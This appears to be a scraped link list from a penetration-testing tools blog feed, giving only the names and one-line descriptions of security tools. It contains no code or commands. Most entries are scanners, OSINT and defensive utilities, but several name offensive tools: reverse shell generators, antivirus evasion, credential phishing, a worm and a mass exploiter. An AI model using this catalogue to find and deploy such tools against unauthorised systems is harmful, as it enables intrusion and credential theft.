- [Userrecon - Find Usernames Across Over 75 Social Networks](http://feedproxy.google.com/~r/PentestTools/~3/UJORLhp0zY8/userrecon-find-usernames-across-over-75.html)
- [WhatWeb v0.5.0 - Next Generation Web Scanner](http://feedproxy.google.com/~r/PentestTools/~3/47Pvc2gPpgM/whatweb-v050-next-generation-web-scanner.html)
- [Faraday v3.8 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/vOafEiELgog/faraday-v38-collaborative-penetration.html)
- [RecScanSec - Reconnaisance Scanner Security](http://feedproxy.google.com/~r/PentestTools/~3/oiNIb-2z3TU/recscansec-reconnaisance-scanner.html)
- [Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io](http://feedproxy.google.com/~r/PentestTools/~3/xeXSGXnN_xA/crashcast-exploit-this-tool-allows-you.html)
- [Tool-X - A Kali Linux Hacking Tool Installer](http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html)
- [SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/RNZTk3qTooc/sqlmap-v13-automatic-sql-injection-and.html)
- [Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information](http://feedproxy.google.com/~r/PentestTools/~3/PdXu9zuRDIg/stretcher-tool-designed-to-help.html)
- [Aztarna - A Footprinting Tool For Robots](http://feedproxy.google.com/~r/PentestTools/~3/Q9CYfShlqRA/aztarna-footprinting-tool-for-robots.html)
- [Hediye - Hash Generator & Cracker Online Offline](http://feedproxy.google.com/~r/PentestTools/~3/p0oO5qBUFoI/hediye-hash-generator-cracker-online.html)
- [Killcast - Manipulate Chromecast Devices In Your Network](http://feedproxy.google.com/~r/PentestTools/~3/rMCHdNb3sTI/killcast-manipulate-chromecast-devices.html)
- [bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records](http://feedproxy.google.com/~r/PentestTools/~3/4GvtphGIZmM/bypass-firewalls-by-dns-history.html)
- [WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack](http://feedproxy.google.com/~r/PentestTools/~3/HogR4BTI3tM/wifi-pumpkin-v087-framework-for-rogue.html)
- [H8Mail - Email OSINT And Password Breach Hunting](http://feedproxy.google.com/~r/PentestTools/~3/u6x3-7n6oMI/h8mail-email-osint-and-password-breach.html)
- [Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters](http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html)
- [Metasploit 5.0 - The World’s Most Used Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html)
- [Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support](http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html)
- [Twifo-Cli - Get User Information Of A Twitter User](http://feedproxy.google.com/~r/PentestTools/~3/Sbc3gunRkBE/twifo-cli-get-user-information-of.html)
- [Sitadel - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html)
- [Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)](http://feedproxy.google.com/~r/PentestTools/~3/MV1mlXFmkpg/pe-sieve-recognizes-and-dumps-variety.html)
- [Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To](http://feedproxy.google.com/~r/PentestTools/~3/sZXmRx1pB7E/malboxes-builds-malware-analysis.html)
- [Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies](http://feedproxy.google.com/~r/PentestTools/~3/elMWRHLI054/snyk-cli-and-build-time-tool-to-find.html)
- [Shed - .NET Runtime Inspector](http://feedproxy.google.com/~r/PentestTools/~3/byWGTLrRRMA/shed-net-runtime-inspector.html)
- [Stardox - Github Stargazers Information Gathering Tool](http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html)
- [Commix v2.7 - Automated All-in-One OS Command Injection And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html)
- [AutoSploit v3.0 - Automated Mass Exploiter](http://feedproxy.google.com/~r/PentestTools/~3/nDoUfG2uHQg/autosploit-v30-automated-mass-exploiter.html)
- [Faraday v3.5 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/Fq1vFkcIIFI/faraday-v35-collaborative-penetration.html)
- [Recaf - A Modern Java Bytecode Editor](http://feedproxy.google.com/~r/PentestTools/~3/mAzq3GzpHIg/recaf-modern-java-bytecode-editor.html)
- [dnSpy - .NET Debugger And Assembly Editor](http://feedproxy.google.com/~r/PentestTools/~3/JZaPW594CQE/dnspy-net-debugger-and-assembly-editor.html)
- [FinalRecon v1.0.2 - OSINT Tool For All-In-One Web Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/3okvQ1-7I50/finalrecon-v102-osint-tool-for-all-in.html)
- [ScoringEngine - Scoring Engine For Red/White/Blue Team Competitions](http://feedproxy.google.com/~r/PentestTools/~3/6nojO49JRLQ/scoringengine-scoring-engine-for.html)
- [Astra - Automated Security Testing For REST API's](http://feedproxy.google.com/~r/PentestTools/~3/hG6EAgiwsNY/astra-automated-security-testing-for.html)
- [HTTPS Everywhere - A Browser Extension That Encrypts Your Communications With Many Websites That Offer HTTPS But Still Allow Unencrypted Connections](http://feedproxy.google.com/~r/PentestTools/~3/paesHNCAgvc/https-everywhere-browser-extension-that.html)
- [uDork - Google Hacking Tool](http://feedproxy.google.com/~r/PentestTools/~3/1dZLaMyTZaw/udork-google-hacking-tool.html)
- [XXExploiter - Tool To Help Exploit XXE Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/W5MJnUs6UJU/xxexploiter-tool-to-help-exploit-xxe.html)
- [Maryam v1.4.0 - Open-source Intelligence(OSINT) Framework](http://feedproxy.google.com/~r/PentestTools/~3/a6fsiOPbEwE/maryam-v140-open-source.html)
- [InstaSave - Python Script To Download Images, Videos & Profile Pictures From Instagram](http://feedproxy.google.com/~r/PentestTools/~3/MkEScdqkcss/instasave-python-script-to-download.html)
- [xShock - Shellshock Exploit](http://feedproxy.google.com/~r/PentestTools/~3/CpqroyrzxeE/xshock-shellshock-exploit.html)
- [Chepy - A Python Lib/Cli Equivalent Of The Awesome CyberChef Tool.](http://feedproxy.google.com/~r/PentestTools/~3/10m1tFD1-VA/chepy-python-libcli-equivalent-of.html)
- [Sshuttle - Transparent Proxy Server That Works As A Poor Man'S VPN. Forwards Over SSH](http://feedproxy.google.com/~r/PentestTools/~3/_Z-rOpqm7NU/sshuttle-transparent-proxy-server-that.html)
- [Lazydocker - The Lazier Way To Manage Everything Docker](http://feedproxy.google.com/~r/PentestTools/~3/m8cMANdPG5I/lazydocker-lazier-way-to-manage.html)
- [Pypykatz - Mimikatz Implementation In Pure Python](http://feedproxy.google.com/~r/PentestTools/~3/5PztilQx0u4/pypykatz-mimikatz-implementation-in.html)
- [Token-Reverser - Word List Generator To Crack Security Tokens](http://feedproxy.google.com/~r/PentestTools/~3/X2bKRiEGktY/token-reverser-word-list-generator-to.html)
- [shuffleDNS - Wrapper Around Massdns Written In Go That Allows You To Enumerate Valid Subdomains](http://feedproxy.google.com/~r/PentestTools/~3/rrx6tcXT4Vg/shuffledns-wrapper-around-massdns.html)
- [AWSGen.py - Generates Permutations, Alterations And Mutations Of AWS S3 Buckets Names](http://feedproxy.google.com/~r/PentestTools/~3/SagQLMEKNHs/awsgenpy-generates-permutations.html)
- [Jeopardize - A Low(Zero) Cost Threat Intelligence & Response Tool Against Phishing Domains](http://feedproxy.google.com/~r/PentestTools/~3/1OfTItxHps8/jeopardize-lowzero-cost-threat.html)
- [TEA - Ssh-Client Worm](http://feedproxy.google.com/~r/PentestTools/~3/F1A172DU-rM/tea-ssh-client-worm.html)
- [Zelos - A Comprehensive Binary Emulation Platform](http://feedproxy.google.com/~r/PentestTools/~3/qKXzoe5Eh0E/zelos-comprehensive-binary-emulation.html)
- [Pickl3 - Windows Active User Credential Phishing Tool](http://feedproxy.google.com/~r/PentestTools/~3/_iEA0MZdCwY/pickl3-windows-active-user-credential.html)
- [Betwixt - Web Debugging Proxy Based On Chrome DevTools Network Panel](http://feedproxy.google.com/~r/PentestTools/~3/l5D0QslTtdA/betwixt-web-debugging-proxy-based-on.html)
- [Dirble - Fast Directory Scanning And Scraping Tool](http://feedproxy.google.com/~r/PentestTools/~3/R3GTkdp1h1Y/dirble-fast-directory-scanning-and.html)
- [Pentest Tools Framework - A Database Of Exploits, Scanners And Tools For Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/Y6MNLlqvjcY/pentest-tools-framework-database-of.html)
- [RedRabbit - Red Team PowerShell Script](http://feedproxy.google.com/~r/PentestTools/~3/lM7n5vczD30/redrabbit-red-team-powershell-script.html)
- [Sifter - A OSINT, Recon And Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/jtvcLi48esc/sifter-osint-recon-and-vulnerability.html)
- [FuzzBench - Fuzzer Benchmarking As A Service](http://feedproxy.google.com/~r/PentestTools/~3/YSLbgTkNe8I/fuzzbench-fuzzer-benchmarking-as-service.html)
- [SSRF Sheriff - A Simple SSRF-testing Sheriff Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/LYrEi0Rzzok/ssrf-sheriff-simple-ssrf-testing.html)
- [Evil SSDP - Spoof SSDP Replies And Create Fake UPnP Devices To Phish For Credentials And NetNTLM Challenge/Response](http://feedproxy.google.com/~r/PentestTools/~3/2_EEUCxHTOg/evil-ssdp-spoof-ssdp-replies-and-create.html)
- [Proton Framework - A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework](http://feedproxy.google.com/~r/PentestTools/~3/iwgsy9fNa_Q/proton-framework-windows-post.html)
- [NTLMRecon - A Tool To Enumerate Information From NTLM Authentication Enabled Web Endpoints](http://feedproxy.google.com/~r/PentestTools/~3/-5fIrhdV5wU/ntlmrecon-tool-to-enumerate-information.html)
- [HoneyBot - Capture, Upload And Analyze Network Traffic](http://feedproxy.google.com/~r/PentestTools/~3/fuF8npyiVbc/honeybot-capture-upload-and-analyze.html)
- [HTTP Asynchronous Reverse Shell - Asynchronous Reverse Shell Using The HTTP Protocol](http://feedproxy.google.com/~r/PentestTools/~3/3KNoIjiuWq8/http-asynchronous-reverse-shell.html)
- [Entropy Toolkit - A Set Of Tools To Exploit Netwave And GoAhead IP Webcams](http://feedproxy.google.com/~r/PentestTools/~3/NNcllHwMmEc/entropy-toolkit-set-of-tools-to-exploit.html)
- [SharpRDP - Remote Desktop Protocol .NET Console Application For Authenticated Command Execution](http://feedproxy.google.com/~r/PentestTools/~3/lFPSF5jJpIc/sharprdp-remote-desktop-protocol-net.html)
- [Ghost Framework - An Android Post Exploitation Framework That Uses An Android Debug Bridge To Remotely Access A n Android Device](http://feedproxy.google.com/~r/PentestTools/~3/PkP7ZK50a2g/ghost-framework-android-post.html)
- [Extended-XSS-Search - Scans For Different Types Of XSS On A List Of URLs](http://feedproxy.google.com/~r/PentestTools/~3/c6DJVlJH-TQ/extended-xss-search-scans-for-different.html)
- [Phonia Toolkit - One Of The Most Advanced Toolkits To Scan Phone Numbers Using Only Free Resources](http://feedproxy.google.com/~r/PentestTools/~3/dEM8uP1mKfM/phonia-toolkit-one-of-most-advanced.html)
- [PrivescCheck - Privilege Escalation Enumeration Script For Windows](http://feedproxy.google.com/~r/PentestTools/~3/bYpS9N5_1u8/privesccheck-privilege-escalation.html)
- [TwitWork - Monitor Twitter Stream](http://feedproxy.google.com/~r/PentestTools/~3/b-cPMo5l19E/twitwork-monitor-twitter-stream.html)
- [XCTR Hacking Tools - All in one tools for Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/b6aWbeWNuv8/xctr-hacking-tools-all-in-one-tools-for.html)
- [WiFi Passview v2.0 - An Open Source Batch Script Based WiFi Passview For Windows!](http://feedproxy.google.com/~r/PentestTools/~3/n6DKUp7nr78/wifi-passview-v20-open-source-batch.html)
- [dnsFookup - DNS Rebinding Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/F41mOliutE4/dnsfookup-dns-rebinding-toolkit.html)
- [BadBlood - Fills A Microsoft Active Directory Domain With A Structure And Thousands Of Objects](http://feedproxy.google.com/~r/PentestTools/~3/0RIQKSdcD7g/badblood-fills-microsoft-active.html)
- [Xencrypt - A PowerShell Script Anti-Virus Evasion Tool](http://feedproxy.google.com/~r/PentestTools/~3/tsG6j90hzCs/xencrypt-powershell-script-anti-virus.html)
- [Subfinder - A Subdomain Discovery Tool That Discovers Valid Subdomains For Websites](http://feedproxy.google.com/~r/PentestTools/~3/vCZaCN82KYg/subfinder-subdomain-discovery-tool-that.html)
- [Extended-SSRF-Search - Smart SSRF Scanner Using Different Methods Like Parameter Brute Forcing In Post And Get...](http://feedproxy.google.com/~r/PentestTools/~3/af0QkevNIdM/extended-ssrf-search-smart-ssrf-scanner.html)
- [IoTGoat - A Deliberately Insecure Firmware Based On OpenWrt](http://feedproxy.google.com/~r/PentestTools/~3/Na957g08Nao/iotgoat-deliberately-insecure-firmware.html)
- [Polyshell - A Bash/Batch/PowerShell Polyglot!](http://feedproxy.google.com/~r/PentestTools/~3/lBSRHwUKH54/polyshell-bashbatchpowershell-polyglot.html)
- [Mouse Framework - An iOS And macOS Post Exploitation Surveillance Framework That Gives You A Command Line Session With Extra Functionality Between You And A Target Machine Using Only A Simple Mouse Payload](http://feedproxy.google.com/~r/PentestTools/~3/44DtEktjcjs/mouse-framework-ios-and-macos-post.html)
- [Multi-Juicer - Run Capture The Flags And Security Trainings With OWASP Juice Shop](http://feedproxy.google.com/~r/PentestTools/~3/rp0ruyY5g8Y/multi-juicer-run-capture-flags-and.html)
- [Progress-Burp - Burp Suite Extension To Track Vulnerability Assessment Progress](http://feedproxy.google.com/~r/PentestTools/~3/eKC-H8D-mlc/progress-burp-burp-suite-extension-to.html)
- [Faraday presents the latest version of their Security Platform for Vulnerability Management Automation](http://feedproxy.google.com/~r/PentestTools/~3/o3jspfMgbBg/faraday-presents-latest-version-of.html)
- [ABD - Course Materials For Advanced Binary Deobfuscation](http://feedproxy.google.com/~r/PentestTools/~3/20oxrKN1-QM/abd-course-materials-for-advanced.html)
- [Wifi-Hacker - Shell Script For Attacking Wireless Connections Using Built-In Kali Tools](http://feedproxy.google.com/~r/PentestTools/~3/reqKjsxqjec/wifi-hacker-shell-script-for-attacking.html)
- [get_Team_Pass - Get Teamviewer's ID And Password From A Remote Computer In The LAN](http://feedproxy.google.com/~r/PentestTools/~3/2nV32YcnHLc/getteampass-get-teamviewers-id-and.html)
- [Faraday presents the latest version of their Security Platform for Vulnerability Management Automation](http://feedproxy.google.com/~r/PentestTools/~3/o3jspfMgbBg/faraday-presents-latest-version-of.html)
- [Dnssearch - A Subdomain Enumeration Tool](http://feedproxy.google.com/~r/PentestTools/~3/cSEFFSWU82Y/dnssearch-subdomain-enumeration-tool.html)
- [Liffy - Local File Inclusion Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/doCxm7pPktM/liffy-local-file-inclusion-exploitation.html)
- [DLLPasswordFilterImplant - DLL Password Filter Implant With Exfiltration Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/mifVxsKvfDU/dllpasswordfilterimplant-dll-password.html)
- [Ohmybackup - Scan Victim Backup Directories & Backup Files](http://feedproxy.google.com/~r/PentestTools/~3/ZCghGgPokOs/ohmybackup-scan-victim-backup.html)
- [Gadgetinspector - A Byte Code Analyzer For Finding Deserialization Gadget Chains In Java Applications](http://feedproxy.google.com/~r/PentestTools/~3/616DRhcc9PY/gadgetinspector-byte-code-analyzer-for.html)
- [OWASP D4N155 - Intelligent And Dynamic Wordlist Using OSINT](http://feedproxy.google.com/~r/PentestTools/~3/n1VoccnlfBQ/owasp-d4n155-intelligent-and-dynamic.html)
- [TaskManager-Button-Disabler - Simple Way To Disable/Rename Buttons From A Task Manager](http://feedproxy.google.com/~r/PentestTools/~3/i-DTAybLUlQ/taskmanager-button-disabler-simple-way.html)
- [SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules' Misconfigurations And Vulnerabilities Within Sudo](http://feedproxy.google.com/~r/PentestTools/~3/mJ6rC9VO2Lw/sudokiller-tool-to-identify-and-exploit.html)
- [Adama - Searches For Threat Hunting And Security Analytics](http://feedproxy.google.com/~r/PentestTools/~3/Lw8c0rtzWHk/adama-searches-for-threat-hunting-and.html)
- [Metabigor - Intelligence Tool But Without API Key](http://feedproxy.google.com/~r/PentestTools/~3/H-YTt6OEKcU/metabigor-intelligence-tool-but-without.html)
- [Rabid - A CLI Tool And Library Allowing To Simply Decode All Kind Of BigIP Cookies](http://feedproxy.google.com/~r/PentestTools/~3/1JMZZAEpemQ/rabid-cli-tool-and-library-allowing-to.html)
- [0L4Bs - Cross-site Scripting Labs For Web Application Security Enthusiasts](http://feedproxy.google.com/~r/PentestTools/~3/Y4d76WceP4E/0l4bs-cross-site-scripting-labs-for-web.html)
- [CVE Api - Parse & filter the latest CVEs from cve.mitre.org](http://feedproxy.google.com/~r/PentestTools/~3/Ek-Lal8-LH8/cve-api-parse-filter-latest-cves-from.html)
- [NekoBot - Auto Exploiter With 500+ Exploit 2000+ Shell](http://feedproxy.google.com/~r/PentestTools/~3/u2JnZaho9cA/nekobot-auto-exploiter-with-500-exploit.html)
- [Gospider - Fast Web Spider Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/PdxXgvqeH3g/gospider-fast-web-spider-written-in-go.html)
- [DecryptTeamViewer - Enumerate And Decrypt TeamViewer Credentials From Windows Registry](http://feedproxy.google.com/~r/PentestTools/~3/uYU3KYqg2cg/decryptteamviewer-enumerate-and-decrypt.html)
- [DrSemu - Malware Detection And Classification Tool Based On Dynamic Behavior](http://feedproxy.google.com/~r/PentestTools/~3/FA9NSGPorlI/drsemu-malware-detection-and.html)
- [Syborg - Recursive DNS Subdomain Enumerator With Dead-End Avoidance System](http://feedproxy.google.com/~r/PentestTools/~3/oPQt_c36ATg/syborg-recursive-dns-subdomain.html)
- [Manul - A Coverage-Guided Parallel Fuzzer For Open-Source And Blackbox Binaries On Windows, Linux And MacOS](http://feedproxy.google.com/~r/PentestTools/~3/UD2xNacURp8/manul-coverage-guided-parallel-fuzzer.html)
- [Fuzzowski - The Network Protocol Fuzzer That We Will Want To Use](http://feedproxy.google.com/~r/PentestTools/~3/eu4riYMhOb4/fuzzowski-network-protocol-fuzzer-that.html)
- [Nray - Distributed Port Scanner](http://feedproxy.google.com/~r/PentestTools/~3/uUwUFSIzAtI/nray-distributed-port-scanner.html)
- [BurpSuite Random User-Agents - Burp Suite Extension For Generate A Random User-Agents](http://feedproxy.google.com/~r/PentestTools/~3/XWRZVszjjKQ/burpsuite-random-user-agents-burp-suite.html)
- [CTFTOOL - Interactive CTF Exploration Tool](http://feedproxy.google.com/~r/PentestTools/~3/SMda1qfS7rQ/ctftool-interactive-ctf-exploration-tool.html)
- [Aduket - Straight-forward HTTP Client Testing, Assertions Included](http://feedproxy.google.com/~r/PentestTools/~3/IoOp4Q2Bsdw/aduket-straight-forward-http-client.html)
- [OpenRelayMagic - Tool To Find SMTP Servers Vulnerable To Open Relay](http://feedproxy.google.com/~r/PentestTools/~3/8djCQDrFViE/openrelaymagic-tool-to-find-smtp.html)
- [Hashcracker - Python Hash Cracker](http://feedproxy.google.com/~r/PentestTools/~3/tQ9w6e50haI/hashcracker-python-hash-cracker.html)
- [KawaiiDeauther - Jam All Wifi Clients/Routers](http://feedproxy.google.com/~r/PentestTools/~3/I4p_-V-WdL4/kawaiideauther-jam-all-wifi.html)
- [Agente - Distributed Simple And Robust Release Management And Monitoring System](http://feedproxy.google.com/~r/PentestTools/~3/MMfIyPc4oQY/agente-distributed-simple-and-robust.html)
- [XSS-Freak - An XSS Scanner Fully Written In Python3 From Scratch](http://feedproxy.google.com/~r/PentestTools/~3/zKryaXden3w/xss-freak-xss-scanner-fully-written-in.html)
- [IPv6Tools - A Robust Modular Framework That Enables The Ability To Visually Audit An IPv6 Enabled Network](http://feedproxy.google.com/~r/PentestTools/~3/zIWvMXjZXwY/ipv6tools-robust-modular-framework-that.html)
- [Pytm - A Pythonic Framework For Threat Modeling](http://feedproxy.google.com/~r/PentestTools/~3/I-03rNekozE/pytm-pythonic-framework-for-threat.html)
- [Netdata - Real-time Performance Monitoring](http://feedproxy.google.com/~r/PentestTools/~3/GZiaz-U_eV0/netdata-real-time-performance-monitoring.html)
- [InjuredAndroid - A Vulnerable Android Application That Shows Simple Examples Of Vulnerabilities In A CTF Style](http://feedproxy.google.com/~r/PentestTools/~3/AlIo6dS7vnA/injuredandroid-vulnerable-android.html)
- [FockCache - Minimalized Test Cache Poisoning](http://feedproxy.google.com/~r/PentestTools/~3/yvUsaKZFbKE/fockcache-minimalized-test-cache.html)
- [Acunetix v13 - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/cILVQWYMmjE/acunetix-v13-web-application-security.html)
- [SEcraper - Search Engine Scraper Tool With BASH Script.](http://feedproxy.google.com/~r/PentestTools/~3/XB3R6BuCcL4/secraper-search-engine-scraper-tool.html)
- [Re2Pcap - Create PCAP file from raw HTTP request or response in seconds](http://feedproxy.google.com/~r/PentestTools/~3/yN0HmWU-WRs/re2pcap-create-pcap-file-from-raw-http.html)
- [Takeover v0.2 - Sub-Domain TakeOver Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/IDqUAZyTWp8/takeover-v02-sub-domain-takeover.html)
- [Misp-Dashboard - A Dashboard For A Real-Time Overview Of Threat Intelligence From MISP Instances](http://feedproxy.google.com/~r/PentestTools/~3/njo_mxuM5uQ/misp-dashboard-dashboard-for-real-time.html)
- [Jaeles v0.4 - The Swiss Army Knife For Automated Web Application Testing](http://feedproxy.google.com/~r/PentestTools/~3/0ZdNMINytRU/jaeles-v04-swiss-army-knife-for.html)
- [Dufflebag - Search Exposed EBS Volumes For Secrets](http://feedproxy.google.com/~r/PentestTools/~3/lY7u0_HX1rY/dufflebag-search-exposed-ebs-volumes.html)
- [Qiling - Advanced Binary Emulation Framework](http://feedproxy.google.com/~r/PentestTools/~3/so35MNAD8Ds/qiling-advanced-binary-emulation.html)
- [Nfstream - A Flexible Network Data Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/7wTSiAirmI4/nfstream-flexible-network-data-analysis.html)
- [WhatTheHack - A Collection Of Challenge Based Hack-A-Thons Including Student Guide, Proctor Guide, Lecture Presentations, Sample/Instructional Code And Templates](http://feedproxy.google.com/~r/PentestTools/~3/UVLZMgsEoyE/whatthehack-collection-of-challenge.html)
- [Injectus - CRLF And Open Redirect Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/4Y4q9n5vYvI/injectus-crlf-and-open-redirect-fuzzer.html)
- [PCFG Cracker - Probabilistic Context Free Grammar (PCFG) Password Guess Generator](http://feedproxy.google.com/~r/PentestTools/~3/pUPLSnr8DAg/pcfg-cracker-probabilistic-context-free.html)
- [DVNA - Damn Vulnerable NodeJS Application](http://feedproxy.google.com/~r/PentestTools/~3/PK1o0xNPV_c/dvna-damn-vulnerable-nodejs-application.html)
- [GDA Android Reversing Tool - A New Decompiler Written Entirely In C++, So It Does Not Rely On The Java Platform, Which Is Succinct, Portable And Fast, And Supports APK, DEX, ODEX, Oat](http://feedproxy.google.com/~r/PentestTools/~3/d0P7zuioR8E/gda-android-reversing-tool-new.html)
- [Project-Black - Pentest/BugBounty Progress Control With Scanning Modules](http://feedproxy.google.com/~r/PentestTools/~3/Ax6sehyyy7Q/project-black-pentestbugbounty-progress.html)
- [RiskAssessmentFramework - Static Application Security Testing](http://feedproxy.google.com/~r/PentestTools/~3/tKjitJqHxMY/riskassessmentframework-static.html)
- [MassDNS - A High-Performance DNS Stub Resolver For Bulk Lookups And Reconnaissance (Subdomain Enumeration)](http://feedproxy.google.com/~r/PentestTools/~3/wardjAcW3y8/massdns-high-performance-dns-stub.html)
- [S3Enum - Fast Amazon S3 Bucket Enumeration Tool For Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/cRCWjBIgR3Q/s3enum-fast-amazon-s3-bucket.html)
- [See-SURF - Python Based Scanner To Find Potential SSRF Parameters](http://feedproxy.google.com/~r/PentestTools/~3/BTvpSqsYkxI/see-surf-python-based-scanner-to-find.html)
- [Blinder - A Python Library To Automate Time-Based Blind SQL Injection](http://feedproxy.google.com/~r/PentestTools/~3/YQkDIo_3R6s/blinder-python-library-to-automate-time.html)
- [Obfuscapk - A Black-Box Obfuscation Tool For Android Apps](http://feedproxy.google.com/~r/PentestTools/~3/FL9KaM-xfFs/obfuscapk-black-box-obfuscation-tool.html)
- [Kali Linux 2020.1 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/RSHYk9L_sow/kali-linux-20201-release-penetration.html)
- [PythonAESObfuscate - Obfuscates A Python Script And The Accompanying Shellcode](http://feedproxy.google.com/~r/PentestTools/~3/QEb6i3xJnFE/pythonaesobfuscate-obfuscates-python.html)
- [ApplicationInspector - A Source Code Analyzer Built For Surfacing Features Of Interest And Other Characteristics To Answer The Question 'What'S In It' Using Static Analysis With A Json Based Rules Engine](http://feedproxy.google.com/~r/PentestTools/~3/mCSCxjbcOGE/applicationinspector-source-code.html)
- [CredNinja - A Multithreaded Tool Designed To Identify If Credentials Are Valid, Invalid, Or Local Admin Valid Credentials Within A Network At-Scale Via SMB, Plus Now With A User Hunter](http://feedproxy.google.com/~r/PentestTools/~3/uvDDyxM0J6o/credninja-multithreaded-tool-designed.html)
- [Mimir - Smart OSINT Collection Of Common IOC Types](http://feedproxy.google.com/~r/PentestTools/~3/_x0y2TtxD5w/mimir-smart-osint-collection-of-common.html)
- [Socialscan - Check Email Address And Username Availability On Online Platforms With 100% Accuracy](http://feedproxy.google.com/~r/PentestTools/~3/yHydtjSLSqU/socialscan-check-email-address-and.html)
- [Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security](http://feedproxy.google.com/~r/PentestTools/~3/A9m6uTb9wwY/aircrack-ng-16-complete-suite-of-tools.html)
- [Memhunter - Live Hunting Of Code Injection Techniques](http://feedproxy.google.com/~r/PentestTools/~3/t80qn5tgm1w/memhunter-live-hunting-of-code.html)
- [AgentSmith-HIDS - Open Source Host-based Intrusion Detection System (HIDS)](http://feedproxy.google.com/~r/PentestTools/~3/ktpMleroAeg/agentsmith-hids-open-source-host-based.html)
- [Hershell - Multiplatform Reverse Shell Generator](http://feedproxy.google.com/~r/PentestTools/~3/rBBYS2KJVlk/hershell-multiplatform-reverse-shell.html)
- [Check-LocalAdminHash - A PowerShell Tool That Attempts To Authenticate To Multiple Hosts Over Either WMI Or SMB Using A Password Hash To Determine If The Provided Credential Is A Local Administrator](http://feedproxy.google.com/~r/PentestTools/~3/-OGGgCcLOic/check-localadminhash-powershell-tool.html)
- [SharpStat - C# Utility That Uses WMI To Run "cmd.exe /c netstat -n", Save The Output To A File, Then Use SMB To Read And Delete The File Remotely](http://feedproxy.google.com/~r/PentestTools/~3/L_7F6PqfmYQ/sharpstat-c-utility-that-uses-wmi-to.html)
- [KsDumper - Dumping Processes Using The Power Of Kernel Space](http://feedproxy.google.com/~r/PentestTools/~3/WAXe05PXlLE/ksdumper-dumping-processes-using-power.html)
- [YARASAFE - Automatic Binary Function Similarity Checks with Yara](http://feedproxy.google.com/~r/PentestTools/~3/Oj-R3rE4Nqs/yarasafe-automatic-binary-function.html)
- [AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model](http://feedproxy.google.com/~r/PentestTools/~3/Wz_C66kvWFE/alertresponder-automatic-security-alert.html)
- [TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries](http://feedproxy.google.com/~r/PentestTools/~3/HXA3Vvtm-Bk/tas-tiny-framework-for-easily.html)
- [Corsy v1.0 - CORS Misconfiguration Scanner](http://feedproxy.google.com/~r/PentestTools/~3/58-ls_cmwQw/corsy-v10-cors-misconfiguration-scanner.html)
- [TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)](http://feedproxy.google.com/~r/PentestTools/~3/2Eo2G25RcDQ/telegram-scraper-telegram-group-scraper.html)
- [Grouper2 - Find Vulnerabilities In AD Group Policy](http://feedproxy.google.com/~r/PentestTools/~3/gWXrrK2NyKY/grouper2-find-vulnerabilities-in-ad.html)
- [Gophish - Open-Source Phishing Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/btpn4JOATyY/gophish-open-source-phishing-toolkit.html)
- [Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder](http://feedproxy.google.com/~r/PentestTools/~3/2yvKL6xqlqM/aaia-aws-identity-and-access-management.html)
- [Scallion - GPU-based Onion Addresses Hash Generator](http://feedproxy.google.com/~r/PentestTools/~3/FqpfCNmnoQU/scallion-gpu-based-onion-addresses-hash.html)
- [Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals](http://feedproxy.google.com/~r/PentestTools/~3/A7Padhi7JMQ/bluewall-firewall-framework-designed.html)
- [AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat](http://feedproxy.google.com/~r/PentestTools/~3/MoEg1J7w6pk/anticheat-testing-framework-framework.html)
